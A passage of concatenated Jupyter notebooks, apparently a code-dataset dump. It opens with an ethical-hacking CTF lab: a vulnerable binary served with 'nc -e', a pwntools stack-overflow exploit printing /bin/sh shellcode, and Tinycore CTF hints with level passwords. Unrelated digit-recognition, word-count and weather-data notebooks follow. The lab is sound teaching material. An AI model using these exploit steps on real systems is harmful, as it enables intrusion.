gid = getegid();\n setresgid(gid, gid, gid);\n bad();\n cout << \"Good bye!\\n\";\n return 0;\n}"
]
],
[
[
"### compile and run as a server\n\n- `make` command must be run as sudo, as the Makefile also disables randomize_va_space\n- inorder to use make and the Python exploit code easily, we'll change the working directory to ctf-demos/basic\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking]\n└─$ cd ctf-demos/basic \n- must run make with sudo to disable randomaize_va_space\n\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ sudo make \n[sudo] password for kali: \n# must run make with sudo to disable randomaize_va_space\necho 0 | tee /proc/sys/kernel/randomize_va_space\n0\ng++ -g -Wall -m32 -fno-stack-protector -z execstack -no-pie vuln.cpp -o vuln.exe \n\n```\n\n- let's make sure the target binary vuln.exe doesn't have any security controls in place to prevent overflow exploitation\n- we can use pwntools **checksec** command\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ pwn checksec vuln.exe \n[*] Checking for new versions of pwntools\n To disable this functionality, set the contents of /home/kali/.cache/.pwntools-cache-3.8/update to 'never' (old way).\n Or add the following lines to ~/.pwn.conf (or /etc/pwn.conf system-wide):\n [update]\n interval=never\n[*] You have the latest version of Pwntools (4.3.1)\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n\n```\n\n- you can follow the instruction shown to never check for the pwntools update\n\n- make sure the nc server is listening on localhost port 1234 to run vuln.exe on client's connection\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ nc -v -l 127.0.0.1 -p 1234 -e vuln.exe\nlistening on [any] 1234 ...\nconnect to [127.0.0.1] from localhost [127.0.0.1] 38332\n\n```\n\n- open another terminal and run netcat to connect to the server \n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ nc localhost 1234 \nbuffer is at 0xffffc360\nGive me some text: sdf\nAcknowledged: sdf with length 3\nGood bye!\n```\n\n- NOTE that when the netcat server finished executing the vuln.exe program upon client's connection, the server then stops\n- you'll have to manually run the netcat server again inorder to interact from a client again...\n- this can be annoying as we'll have to interact with the vulnerable program many times\n- the following bash script comes to our rescue!",
"_____no_output_____"
]
],
[
[
"! cat ./ctf-demos/basic/netcat-loop.sh",
"_____no_output_____"
]
],
[
[
"- from one terminal, run the bash script, so server is listening indefinitely one clinet after another\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ bash netcat-loop.sh \nlistening on [any] 1234 ...\n\nconnect to [127.0.0.1] from localhost [127.0.0.1] 38336\nlistening on [any] 1234 ...\nconnect to [127.0.0.1] from localhost [127.0.0.1] 38340\nlistening on [any] 1234 ...\n```\n\n- from another terminal, continously connect to the server without having to rerun the server!\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ nc localhost 1234 \nbuffer is at 0xffffc360\nGive me some text: sdf\nAcknowledged: sdf with length 3\nGood bye!\n```",
"_____no_output_____"
],
[
"## Remote CTF Demo\n- use `pwntools` to create a exploit code template\n- to create exploit template, we need the following:\n - name of the target program\n - ip of the host the binary will be running on (use 127.0.0.1 loopback for localhost as in this demo)\n - the port number the server is listening on (pick unuser higher port numbers (above 1024)\n - for online CTF, provide the server's IP and port typically provided to the contestents\n\n```bash\n(base) kali@kali:~/EthicalHacking/demos/ctf$ pwn template ./vuln.exe --host localhost --port 1234 > exploit.py\n```\n\n- the generated `exploit.py` file provides a lot of boiler-plate code:\n - for automatically detecting architecture of the target program\n - stdio framework to interact with the target program locally\n - locally meaning accessing program.exe directly from a terminal\n - remotely meaning accessing a host via tcp/ip (ip:port)\n - the same code works without little or no modification locally and remotely\n - debug feature to display hexdump of stdio\n - feature to generate the shellcode, etc.\n\n- let's look at the content of the `exploit.py`\n\n```python\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# This exploit template was generated via:\n# $ pwn template ./vuln.exe --host 127.0.0.1 --port 1234\nfrom pwn import *\n\n# Set up pwntools for the correct architecture\nexe = context.binary = ELF('./vuln.exe')\n\n# Many built-in settings can be controlled on the command-line and show up\n# in \"args\". For example, to dump all data sent/received, and disable ASLR\n# for all created processes...\n# ./exploit.py DEBUG NOASLR\n# ./exploit.py GDB HOST=example.com PORT=4141\nhost = args.HOST or '127.0.0.1'\nport = int(args.PORT or 1234)\n\ndef local(argv=[], *a, **kw):\n '''Execute the target binary locally'''\n if args.GDB:\n return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)\n else:\n return process([exe.path] + argv, *a, **kw)\n\ndef remote(argv=[], *a, **kw):\n '''Connect to the process on the remote host'''\n io = connect(host, port)\n if args.GDB:\n gdb.attach(io, gdbscript=gdbscript)\n return io\n\ndef start(argv=[], *a, **kw):\n '''Start the exploit against the target.'''\n if args.LOCAL:\n return local(argv, *a, **kw)\n else:\n return remote(argv, *a, **kw)\n\n# Specify your GDB script here for debugging\n# GDB will be launched if the exploit is run via e.g.\n# ./exploit.py GDB\ngdbscript = '''\ntbreak main\ncontinue\n'''.format(**locals())\n\n#===========================================================\n# EXPLOIT GOES HERE\n#===========================================================\n# Arch: i386-32-little\n# RELRO: Partial RELRO\n# Stack: No canary found\n# NX: NX disabled\n# PIE: No PIE (0x8048000)\n# RWX: Has RWX segments\n\nio = start()\n\n# shellcode = asm(shellcraft.sh())\n# payload = fit({\n# 32: 0xdeadbeef,\n# 'iaaa': [1, 2, 'Hello', 3]\n# }, length=128)\n# io.send(payload)\n# flag = io.recv(...)\n# log.success(flag)\n\nio.interactive()\n\n```\n\n- now let's do a quick test of the exploit code\n- make sure the nc server is listening on localhost port 1234 to run vuln.exe on connection\n- use the `netcat-loop.sh` script to run server in the loop\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ bash netcat-loop.sh \nlistening on [any] 1234 ...\n```\n\n- open another terminal and run the exploit code exploit.py \n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ python exploit.py\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n[+] Opening connection to localhost on port 1234: Done\n[*] Switching to interactive mode\nbuffer is at 0xffffc360\nGive me some text: $ do you copy this?\nAcknowledged: do you copy this? with length 17\nGood bye!\n[*] Got EOF while reading in interactive\n$ \n$ \n[*] Closed connection to localhost port 1234\n[*] Got EOF while sending in interactive\n```\n\n### Update Exploit code\n- the vulnerable program is exactly the same as the stack_overflow/so_stdio.cpp\n- the exploit code is also exactly the same as a result to send and execute shellcode from the vulnerable program's stack\n- let's look at the updated exploit code `exploit_vuln.py` file\n\n### Find offset of buffer\n- run the `exploit_getoffset.py` script to automatically run the binary locally, crash and find the offset from coredump\n- you can also use `gdb-peda`\n- offset is same locally or remotely as long as the the program is run on the same architecture\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ python exploit_getoffset.py 1 ⨯ 1 ⚙\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n[+] Starting local process '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe': pid 11262\n[*] Process '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe' stopped with exit code -11 (SIGSEGV) (pid 11262)\n[+] Parsing corefile...: Done\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/core.11262'\n Arch: i386-32-little\n EIP: 0x61616161\n ESP: 0xffffc3a0\n Exe: '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe' (0x8049000)\n Fault: 0x61616161\noffset = 144\n```\n- use the offset to generate and send the payload",
"_____no_output_____"
]
],
[
[
"! cat ./ctf-demos/basic/exploit_vuln.py",
"_____no_output_____"
]
],
[
[
"- run the updated exploit code\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ python exploit_vuln.py 1 ⨯ 1 ⚙\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n[+] Opening connection to 127.0.0.1 on port 1234: Done\nb'Give me some text: Acknowledged: \\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x901\\xc0Ph//shh/bin\\x89\\xe31\\xc9\\x89\\xcaj\\x0bX\\xcd\\x80`\\xc3\\xff\\xff`\\xc3\\xff\\xff`\\xc3\\xff\\xff`\\xc3\\xff\\xff`\\xc3\\xff\\xff with length 144\\n'\n[*] Switching to interactive mode\n$ \n$ whoami\nkali\n$ date\nTue Dec 29 15:40:46 MST 2020\n$ \n```",
"_____no_output_____"
],
[
"### run Python exploit with arguments\n\n```bash\n$ python exploit_vuln.py LOCAL\n$ python exploit_vuln.py HOST=127.0.0.1 PORT=1234\n```",
"_____no_output_____"
],
[
"## Invoking libc functions in Python\n- need https://docs.python.org/3/library/ctypes.html\n\n## Find local libc.so file\n- one way to do that is using `ldd` command along with a C/C++ binary",
"_____no_output_____"
]
],
[
[
"! ldd demo.exe\n# see libc.so.6 file",
"\tlinux-gate.so.1 (0xf7fc9000)\n\tlibstdc++.so.6 => /lib32/libstdc++.so.6 (0xf7d83000)\n\tlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7b8f000)\n\tlibm.so.6 => /lib/i386-linux-gnu/libm.so.6 (0xf7a8b000)\n\t/lib/ld-linux.so.2 (0xf7fcb000)\n\tlibgcc_s.so.1 => /lib/i386-linux-gnu/libgcc_s.so.1 (0xf7a64000)\n"
],
[
"from ctypes import *",
"_____no_output_____"
],
[
"# invoke a C function in Python\nlibc = cdll.LoadLibrary(\"libc.so.6\")",
"_____no_output_____"
],
[
"libc.printf(b\"Hello!\\n\")\n# actual output is not seen on Jupyter notebook... only shows the no. of bytes printed",
"7\n"
],
[
"# run script file instead\n! cat ctf-demos/rop1/libc.py",
"#! /usr/bin/env python3\n\n# how to invoke C function in Python\nfrom ctypes import *\nlibc = cdll.LoadLibrary(\"/lib/x86_64-linux-gnu/libc.so.6\")\nlibc.printf(b\"Hello World\\n\")\n\n"
],
[
"# run script instead\n! python ctf-demos/rop1/libc.py",
"Hello World\n"
]
],
[
[
"## Tinycore Capture The Flag (CTF)\n- Download and install as a VM: - https://ctf-o-matic.github.io/capture-the-flag/\n- Based on Strip CTF: https://stripe.com/blog/capture-the-flag\n- Level 5 readme correction:\n - Webservice is running at port 8005 not at 9020 as the motd.txt description says\n - `$curl localhost:8005 -d \"hello there\"`\n- Hints: https://github.com/dividuum/stripe-ctf\n- Learn about Tinycore Linux: [http://tinycorelinux.net/intro.html](http://tinycorelinux.net/intro.html)\n- Has 6 levels\n\n### level00@box has two files: motd.txt and tools.txt\n- cat tools.txt to get some general ideas about the tools and technqiues\n- motd.txt describes about TinyCore CTF and the information on what to do to get to the next level\n\n### Installing apps and tools - Use Tiny Core Extension: Application Browser\n- Let's say you want to install gcc; first switch to `tc` user\n```bash\n$ su tc\n$ tce \n```\n- search for: compile\n- install compiletc package which installs everything to compile using gcc\n\n### Now compile level01.c program\n- how to edit? Use vi or nano\n- or locally edit and upload using Netcat\n- TinyCoreCTF doens't have GUI to work with files so one can send files back-and-forth to a GUI supported Linux environment\n - if you want to send file to TinyCore do the following:\n - on Tinycore run netcat in listening mode:\n - `$ nc -v -l -p [port] > filename` \n - from Kali Linux send a file:\n - `$ cat file | nc -v [tinycoreIP] [tinycorePort]`",
"_____no_output_____"
],
[
"## Hints\n- see all the levels\n```bash\n$ cd /levels\n```",
"_____no_output_____"
],
[
"### level00\n- nothing to do here; but just be familiar with the CTF\n- password (izeecahd) is in /home/level00/.password\n```bash\n$ cd /levels/level00\n$ cat /home/level00/.password\n```\n- this folder is empty",
"_____no_output_____"
],
[
"### level01\n- create a program that can read the password/flag for level01 user\n- use levels/level01 files to make it happen\n- password (aepeefoo) is in /home/level01/.password\n- see the contents of level01\n```bash\n$ cd /levels/level01/\n```",
"_____no_output_____"
],
[
"### level02\n- web-based vulnerability\n- password (quemaosh) is in /home/level02/.password file\n- force the webserver to read the password file and display the content as response\n- see the contents of /levels/level02/ folder\n```bash\n$ curl http://localhost:8002\n$ less /levels/level02/level02.py\n$ curl --cookie \"some_cookie=value\" http://localhost:8002\n```\n- can use browser from host to interact with the form\n- http://[ip]:8002/\n- use cookie editor plugin for chrome or proxy tool such as owasp zap or burpuite that come with Kali",
"_____no_output_____"
],
[
"### level03\n- password (eingaima) for level03 is in /home/level03/.password file\n- files in /levels/level03 may be useful\n- binary level03 provides some functionalites to work with some string\n\n```bash\n$ cd /levels/level03\n$ ls\n$ ./level03\n$ ./level03 0 \"hello world\"\n\n```\n- negative index?\n- carefully read level03.c file\n- fns is array of function addresses, find the offset of depricated run function\n- pass it with proper offset to get the run function to execute\n- use gdb or write a script to bruteforce it!",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e708e49417a17894603fa5211a668ea344c3dc2a | 11,556 | ipynb | Jupyter Notebook | digit-recognition.ipynb | Uamhan/Emerging-technologies-assignments | 3bda752df2f649df38e9655e670f52a0a6b8ed5c | [
"Apache-2.0"
] | null | null | null | digit-recognition.ipynb | Uamhan/Emerging-technologies-assignments | 3bda752df2f649df38e9655e670f52a0a6b8ed5c | [
"Apache-2.0"
] | null | null | null | digit-recognition.ipynb | Uamhan/Emerging-technologies-assignments | 3bda752df2f649df38e9655e670f52a0a6b8ed5c | [
"Apache-2.0"
] | null | null | null | 42.959108 | 1,074 | 0.676964 | [
[
[
"## Digit recognition\n\nIn this note book we will cover the digit recognition python script also found in this repositiory. we will first break the script down into three sections. first the machine learning section, which trainings the model used to make the predictions. the second section will be how we get the users image and manipulate it and third will be the user interface generated by the script.",
"_____no_output_____"
],
[
"### Machine learning\n\nThis section will discuss the the main bulk of the functional code in this script. all of this code is containted withing the predict_image method that takes the user image as input. this method imports the mnist data set from the keras library into testing and training sets to be used with the model we create. This section is broken down into three main components the model that we will train. the training section itself and finaly the predicition process.This will be concluded by discussing the performance of the model and predicitions.\n\n#### Model\n\nThe first step in our machine learning predicition is to create/load the Model we will be using to make predicitions.\nAt first the script will try to load a pre existing model. if it is not present it will create the model.\n\nThis model is a keras sequential model this tells us that the layers are in a linear stack. i have decided to go with keras Conv2d Layers predominatly for this model (convolutional layer specificaly for 2d images)as they are very effective in visual based scenarios.\n\nThe first layer of our model is a conv2D layer with 32 nodes. a kernal size of (3,3) which refers to the width x height of the filter mask. it has its activation function set to relu this stands for Rectifier or rectified linear unit this activation function is used comonly in computer vision tasks. finaly it has an input shape of (28,28,1) whitch models out mnist data set image dimensions.\n",
"_____no_output_____"
]
],
[
[
"# model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape))",
"_____no_output_____"
]
],
[
[
"the next layer is much the same but this time the conv2D layer has 64 nodes instead of 32",
"_____no_output_____"
]
],
[
[
"# model.add(Conv2D(64, (3, 3), activation='relu'))",
"_____no_output_____"
]
],
[
[
"We then apply a max pooling of (2,2) which reduces our output shape from the previos layer from (3,3) to (2,2) taking the max pixel values.",
"_____no_output_____"
]
],
[
[
"# model.add(MaxPooling2D(pool_size=(2, 2)))",
"_____no_output_____"
]
],
[
[
"we then apply a dropout of 0.25 this helps prevent overfitting to out training set by droping out random nodes from our model at a 25% chance ratio.",
"_____no_output_____"
]
],
[
[
"# model.add(Dropout(0.25))",
"_____no_output_____"
]
],
[
[
"we then flatten the current layer back down to a one dimensional array.",
"_____no_output_____"
]
],
[
[
"# model.add(Flatten())",
"_____no_output_____"
]
],
[
[
"we then add a dense layer with 128 nodes dense layers are layers where all of the inputs are connected to all of the outputs. it also uses the same relu activation as discussed above.",
"_____no_output_____"
]
],
[
[
"# model.add(Dense(128, activation='relu'))",
"_____no_output_____"
]
],
[
[
"We then apply another dropout rate of 50% this time.This reduces the amount of weights in the dense layer by 50 percent as we are droping half of the nodes randomly. this is helpful as in a dense layer we have weights equal to the number of outputs times the number of inputs which can become very large. the dropout rate here not only prevents over fitting it greatly increases the efficency of our model training.",
"_____no_output_____"
]
],
[
[
"# model.add(Dropout(0.5))",
"_____no_output_____"
]
],
[
[
"Finaly we have the last dense layer this time with on node per desired output in this case it will be 10 as the model will be predicting a number between 0-9.",
"_____no_output_____"
]
],
[
[
"# model.add(Dense(10,activation=tf.nn.softmax))",
"_____no_output_____"
]
],
[
[
"we then need to complile the model. we are using adam optimiser with the spare categorical creossentropy for our loss function with the solo metric of accuracy. I chose the adam optimisation as its Computationally efficient and well suited for problems that are large in terms of data and/or parameters. since we are useing images for our inputs even at the reduced size of 28x28 pixels these advantages are incredibly useful. our taget predictions are integers and not one hot codeds so spare_categorical_crossentropy is the logical choice fot the loss function and we have chose to simply display accuracy of the prediction as our only metric",
"_____no_output_____"
]
],
[
[
"# model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])",
"_____no_output_____"
]
],
[
[
"We then fit our MNIST training data that we imported from the keras library to the model. we have decided to go with 10 iterations of the fitting to maxamise the accuracy of our results any thing more than 10 has seemed to produce neglibles results in this given problem. we will be using the test data we imported from the keras library as our validation set. and finaly we save the model weights so the user will only have to train the model once.",
"_____no_output_____"
]
],
[
[
"# model.fit(data_training, label_training,epochs=10,validation_data=(data_test, label_test))",
"_____no_output_____"
]
],
[
[
"#### Predicitions\n\nTo make predictions we simply convert the user input image to a numpy array and reshape it the (1,28,28,1) so as to match the values the model was trained on. the predict method will return an array with 10 values. the index of the value represents the number it is predicting. the values in the array represent the likelyhood of that result. so a simple argmax call on the prediciton array will return the most likely predicition.",
"_____no_output_____"
]
],
[
[
"#converts user inputed image\nnpImageArray = np.array(userimage)\n#predicts the digit from user image using the model\nprediction = model.predict(npImageArray.reshape(1,28,28,1))\n#returns predicted value\nreturn(prediction.argmax())",
"_____no_output_____"
]
],
[
[
"#### Performance\n\nThe main metric for performace we will be using for this model is the accuracy of the predicition as ultimately the goal of a digit recognition program is to be able to correctly recognise the digits. in the image bellow we will see the loss and accuracy values for each epoch of the training period. as we can see after completion of the tenth epoch we have an accuracy of 0.9831 or 98.31% while a result such as this may not be suficent for the likes of a self driving car as lifes can depend on it for the task of visual recognition a 98% accuracy is satisfactory.\n\n<img src=\"img/epoch.JPG\" width=\"600\" height=\"400\" align=\"left\" />",
"_____no_output_____"
],
[
"On a mid teir intel cpu each epoch took roughly 2 and half minutes leading to a 25 minute training time with all ten epochs the epoch value in the script can be changed to reduce the training time at a cost to accuracy.",
"_____no_output_____"
],
[
"### User Image\n\nThis section will cover the method the script uses of inporting the users image and how it preps this image for the predicition process.\n\nthe prep_image method takes in an image converts it to gray scale resizes the image to 28x28 pixels to match the mnist dataset we then flatten the image from 0-255 shades between white and black to two shades white or black. it then returns this modifyed image.\n\nwe then have the select image function. this is the function that will be called by the button in the user interface as will be discused in the following section. this function will access a pannel that the image will be displayed on. the path of the image will be taken from tkinters filedialog method that will open the windows explore and the user may select there image. it will then check to see if the path is not empty. as would be the case if the user clicked cancel instead of the image they wanted. we import the image from that path into our image varibale. we then convert the image from BGR to RGB witch are two difrent colour formats and we need the image to be in RGB to display it properly for the user. we then call the prep_image method as discussed above this preped image is then passed to the predicition method also discussed above. the prediction is printed to the console. the image panel is then instantiated if it is not already. The display image is set to the user image so we can see the image and the scripts prediciton at the same time. ",
"_____no_output_____"
],
[
"### User Interface\n\nFor this script we have written a very simply user inteface that simply consists of a select image button that will allow the user to select an image using the OS file explorer. this image will then be preped for predicition used with the model to get a predicition which will be printed to the console and the userinterface will display the image the user selected.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e708e65904c03c5206fa86cf26b9cd04ddc2b2ab | 7,212 | ipynb | Jupyter Notebook | project/Front/Front_s/word_count.ipynb | yoonputer/Project_Guardians | c7643c32dfe761f8c9faf3e160a3be26a1948d48 | [
"Apache-2.0"
] | null | null | null | project/Front/Front_s/word_count.ipynb | yoonputer/Project_Guardians | c7643c32dfe761f8c9faf3e160a3be26a1948d48 | [
"Apache-2.0"
] | null | null | null | project/Front/Front_s/word_count.ipynb | yoonputer/Project_Guardians | c7643c32dfe761f8c9faf3e160a3be26a1948d48 | [
"Apache-2.0"
] | 2 | 2021-09-10T11:19:25.000Z | 2021-09-23T23:58:33.000Z | 7,212 | 7,212 | 0.510399 | [
[
[
"import pandas as pd",
"_____no_output_____"
],
[
"df = pd.read_excel('2019.xlsx')",
"_____no_output_____"
],
[
"top = df['특성추출(가중치순 상위 50개)']",
"_____no_output_____"
],
[
"words = []\n\nfor i in range(len(top)):\n a = str(top[i])\n wordlist = a.split(',')\n words.append(wordlist) ",
"_____no_output_____"
],
[
"word_list = []\nfor word in words:\n word_list += word",
"_____no_output_____"
],
[
"wordcount = {}\n\nfor word in word_list:\n wordcount[word] = wordcount.get(word, 0) + 1\n keys = sorted(wordcount.keys())",
"_____no_output_____"
],
[
"df = pd.DataFrame(wordcount, index = ['count'])\ndf = df.transpose()\ndf['year'] = 2019\ndf",
"_____no_output_____"
],
[
"len(df)",
"_____no_output_____"
],
[
"count = df['count'] > 150\ndf = df.loc[count,:]\ndf",
"_____no_output_____"
],
[
"df.to_excel('2019_count.xlsx')",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e708e75daf39ab3a889fa37cfe91d6358af5d81c | 348,438 | ipynb | Jupyter Notebook | PrawlerDeployments/ERDDAP_PMEL_2019_Meteorology.ipynb | shaunwbell/ipythonnb | c2f35b1524dc14fb0f12a8846a794af1bd3b3d3a | [
"MIT"
] | 3 | 2017-03-23T16:52:44.000Z | 2022-03-08T16:53:29.000Z | PrawlerDeployments/ERDDAP_PMEL_2019_Meteorology.ipynb | shaunwbell/ipythonnb | c2f35b1524dc14fb0f12a8846a794af1bd3b3d3a | [
"MIT"
] | null | null | null | PrawlerDeployments/ERDDAP_PMEL_2019_Meteorology.ipynb | shaunwbell/ipythonnb | c2f35b1524dc14fb0f12a8846a794af1bd3b3d3a | [
"MIT"
] | 2 | 2017-03-30T22:01:25.000Z | 2019-10-17T17:30:29.000Z | 332.796562 | 71,828 | 0.91701 | [
[
[
"## SFC Meteorology Obs from:\n** - 2019 M2 (BSITAEPR-2A) ** \n*** - 2019 M2 (BSM-2A) ***\n\n__pyversion__==3.6 \n__author__==S.Bell",
"_____no_output_____"
]
],
[
[
"import datetime\nprint(\"Last run {0}\".format(datetime.datetime.now()))",
"Last run 2019-09-26 17:22:27.139992\n"
]
],
[
[
"### connecting to erddap and retrieving and basic information",
"_____no_output_____"
]
],
[
[
"from erddapy import ERDDAP\nimport pandas as pd\nimport numpy as np\n\nserver_url = 'http://downdraft.pmel.noaa.gov:8080/erddap'\n\ne = ERDDAP(server=server_url)",
"_____no_output_____"
],
[
"df = pd.read_csv(e.get_search_url(response='csv', search_for='a_met'))",
"_____no_output_____"
],
[
"'We have {} tabledap, {} griddap, and {} wms endpoints.'.format(\n len(set(df['tabledap'].dropna())),\n len(set(df['griddap'].dropna())),\n len(set(df['wms'].dropna()))\n)",
"_____no_output_____"
],
[
"datasets = df['Dataset ID'].values\nprint(datasets)",
"['erddap_17ckitaem2a_met' 'erddap_18bsitaepr2a_met'\n 'erddap_18mtitaepr1a_met' 'erddap_19bsitaepr2a_met']\n"
],
[
"variables = [e.get_var_by_attr(dataset_id=dataset, standard_name=lambda v: v is not None) for dataset in datasets]\nprint(variables)",
"[['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'wind_speed', 'time', 'longitude', 'wind_from_direction'], ['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'wind_speed', 'time', 'longitude', 'wind_from_direction'], ['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'wind_speed', 'time', 'longitude', 'wind_from_direction'], ['air_temperature', 'air_pressure', 'latitude', 'relative_humidity', 'eastward_wind', 'northward_wind', 'time', 'longitude']]\n"
]
],
[
[
"### getting Peggy Buoy (BSM-2A) Data",
"_____no_output_____"
]
],
[
[
"wdf = pd.read_csv('http://pavlof.pmel.noaa.gov/bell/ArgosMooring/data/TotalArgosMessage_28882.csv',\n parse_dates=True,index_col='sampletime')",
"_____no_output_____"
],
[
"wdf = wdf.resample('1H').mean()",
"_____no_output_____"
]
],
[
[
"### retrieving erddap and plotting data",
"_____no_output_____"
]
],
[
[
"constraints = {\n 'time>=': '2019-04-25T00:00:00Z',\n 'time<=': str(datetime.datetime.today()),\n}\n\nstart_date = '2019-04-15'\nend_date = '2019-10-01'\n\nvariables = [\n# 'wind_from_direction', \n 'air_temperature',\n 'relative_humidity',\n 'northward_wind', \n 'eastward_wind', \n# 'wind_speed', \n 'latitude',\n 'longitude',\n 'time'\n]\n\nvariable_dic={}\n\nfor index,row in df.iterrows():\n info_url = e.get_info_url(dataset_id=row['Dataset ID'], response='csv')\n info = pd.read_csv(info_url)\n\n #print(info.head())\n print('Variables in {}:'.format(row['Dataset ID']))\n print(','.join(info.loc[info['Row Type'] == 'variable', 'Variable Name']))\n\n variable_dic.update({row['Dataset ID']:list(info.loc[info['Row Type'] == 'variable', 'Variable Name'])})\n ",
"Variables in erddap_17ckitaem2a_met:\ntimeseries_id,time,wind_speed,northward_wind,latitude,longitude,air_pressure,relative_humidity,air_temperature,wind_from_direction,eastward_wind\nVariables in erddap_18bsitaepr2a_met:\ntimeseries_id,time,wind_speed,northward_wind,latitude,longitude,air_pressure,relative_humidity,air_temperature,wind_from_direction,eastward_wind\nVariables in erddap_18mtitaepr1a_met:\ntimeseries_id,time,wind_speed,northward_wind,latitude,longitude,air_pressure,relative_humidity,air_temperature,wind_from_direction,eastward_wind\nVariables in erddap_19bsitaepr2a_met:\ntimeseries_id,latitude,longitude,time,northward_wind,air_pressure,relative_humidity,air_temperature,eastward_wind\n"
],
[
"from requests.exceptions import HTTPError\n\ndfs = {}\nfor index,row in df.iterrows():\n if row['Dataset ID'] in ['erddap_19bsitaepr2a_met']:\n print(row['Dataset ID'])\n try:\n e = ERDDAP(server=server_url,\n protocol='tabledap',\n response='csv',\n )\n e.dataset_id=row['Dataset ID']\n e.constraints=constraints\n if row['Dataset ID'] in ['erddap_19bsitaepr2a_met']:\n e.variables=variables + ['air_pressure']\n except HTTPError:\n print('Failed to generate url {}'.format(row['Dataset ID']))\n continue\n dfs.update({row['Dataset ID']: e.to_pandas(\n index_col='time (UTC)',\n parse_dates=True,\n skiprows=(1,) # units information can be dropped.\n )})\n ",
"erddap_19bsitaepr2a_met\n"
],
[
"df=dfs['erddap_19bsitaepr2a_met']\ndf.columns",
"_____no_output_____"
]
],
[
[
"### Take care of any preliminary QC",
"_____no_output_____"
]
],
[
[
"#calculate windspeed and direction\ndf['wind_speed (m s-1)']=np.sqrt(df['northward_wind']**2 + df['eastward_wind']**2)\ndf['wind_from_direction (degrees true)'] = 270-np.rad2deg(np.arctan2(df['northward_wind'],\n df['eastward_wind']))\n\ndf['wind_from_direction (degrees true)'][df['wind_from_direction (degrees true)']>360] = df['wind_from_direction (degrees true)'][df['wind_from_direction (degrees true)']>360]-360\n",
"_____no_output_____"
],
[
